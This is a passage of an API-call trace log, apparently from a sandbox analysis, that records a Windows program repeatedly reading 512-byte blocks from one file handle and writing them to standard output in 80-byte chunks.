lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.946] GetFileType (hFile=0x50) returned 0x1 [0216.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.946] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.946] GetFileType (hFile=0x50) returned 0x1 [0216.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.946] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.946] GetFileType (hFile=0x50) returned 0x1 [0216.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.946] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.946] GetFileType (hFile=0x50) returned 0x1 [0216.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.946] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.946] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.946] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.947] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.947] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.947] GetFileType (hFile=0x50) returned 0x1 [0216.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.947] GetFileType (hFile=0x50) returned 0x1 [0216.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.947] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.947] GetFileType (hFile=0x50) returned 0x1 [0216.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.947] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.947] GetFileType (hFile=0x50) returned 0x1 [0216.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.947] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.947] GetFileType (hFile=0x50) returned 0x1 [0216.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.947] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.947] GetFileType (hFile=0x50) returned 0x1 [0216.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.947] WriteFile (in: 
hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.948] GetFileType (hFile=0x50) returned 0x1 [0216.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.948] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.948] GetFileType (hFile=0x50) returned 0x1 [0216.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.948] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.948] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.948] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.948] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.948] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.948] GetFileType (hFile=0x50) returned 0x1 [0216.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.948] GetFileType (hFile=0x50) returned 0x1 [0216.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.948] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.948] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0216.948] GetFileType (hFile=0x50) returned 0x1 [0216.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.948] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.949] GetFileType (hFile=0x50) returned 0x1 [0216.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.949] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.949] GetFileType (hFile=0x50) returned 0x1 [0216.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.949] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.949] GetFileType (hFile=0x50) returned 0x1 [0216.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.949] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.949] GetFileType (hFile=0x50) returned 0x1 [0216.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.949] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.949] _get_osfhandle (_FileHandle=1) returned 0x50 
[0216.949] GetFileType (hFile=0x50) returned 0x1 [0216.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.949] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.949] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.949] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.950] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.950] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.950] GetFileType (hFile=0x50) returned 0x1 [0216.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.950] GetFileType (hFile=0x50) returned 0x1 [0216.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.950] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.950] GetFileType (hFile=0x50) returned 0x1 [0216.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.950] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.950] GetFileType (hFile=0x50) returned 0x1 [0216.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.950] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, 
lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.950] GetFileType (hFile=0x50) returned 0x1 [0216.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.950] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.951] GetFileType (hFile=0x50) returned 0x1 [0216.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.951] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.951] GetFileType (hFile=0x50) returned 0x1 [0216.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.951] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.951] GetFileType (hFile=0x50) returned 0x1 [0216.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.951] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.951] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.951] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.951] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.951] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.951] GetFileType (hFile=0x50) returned 0x1 [0216.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.951] GetFileType (hFile=0x50) returned 0x1 [0216.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.951] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.952] GetFileType (hFile=0x50) returned 0x1 [0216.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.952] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.952] GetFileType (hFile=0x50) returned 0x1 [0216.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.952] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.952] GetFileType (hFile=0x50) returned 0x1 [0216.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.952] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.952] GetFileType (hFile=0x50) returned 0x1 [0216.952] _get_osfhandle (_FileHandle=1) returned 
0x50 [0216.952] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.952] GetFileType (hFile=0x50) returned 0x1 [0216.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.952] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.952] GetFileType (hFile=0x50) returned 0x1 [0216.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.953] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.953] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.953] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.953] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.953] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.953] GetFileType (hFile=0x50) returned 0x1 [0216.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.953] GetFileType (hFile=0x50) returned 0x1 [0216.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.953] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) 
returned 1 [0216.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.953] GetFileType (hFile=0x50) returned 0x1 [0216.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.953] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.953] GetFileType (hFile=0x50) returned 0x1 [0216.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.953] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.954] GetFileType (hFile=0x50) returned 0x1 [0216.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.954] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.954] GetFileType (hFile=0x50) returned 0x1 [0216.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.954] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.954] GetFileType (hFile=0x50) returned 0x1 [0216.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.954] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.954] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0216.954] GetFileType (hFile=0x50) returned 0x1 [0216.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.954] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.954] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.954] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.954] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.954] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.954] GetFileType (hFile=0x50) returned 0x1 [0216.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.955] GetFileType (hFile=0x50) returned 0x1 [0216.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.955] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.955] GetFileType (hFile=0x50) returned 0x1 [0216.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.955] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.955] GetFileType (hFile=0x50) returned 0x1 [0216.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.955] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.955] GetFileType (hFile=0x50) returned 0x1 [0216.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.955] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.955] GetFileType (hFile=0x50) returned 0x1 [0216.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.955] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.956] GetFileType (hFile=0x50) returned 0x1 [0216.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.956] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.956] GetFileType (hFile=0x50) returned 0x1 [0216.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.956] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.956] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.956] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.956] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.956] ReadFile 
(in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.956] GetFileType (hFile=0x50) returned 0x1 [0216.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.956] GetFileType (hFile=0x50) returned 0x1 [0216.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.956] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.956] GetFileType (hFile=0x50) returned 0x1 [0216.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.957] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.957] GetFileType (hFile=0x50) returned 0x1 [0216.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.957] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.957] GetFileType (hFile=0x50) returned 0x1 [0216.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.957] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.957] GetFileType (hFile=0x50) returned 0x1 [0216.957] 
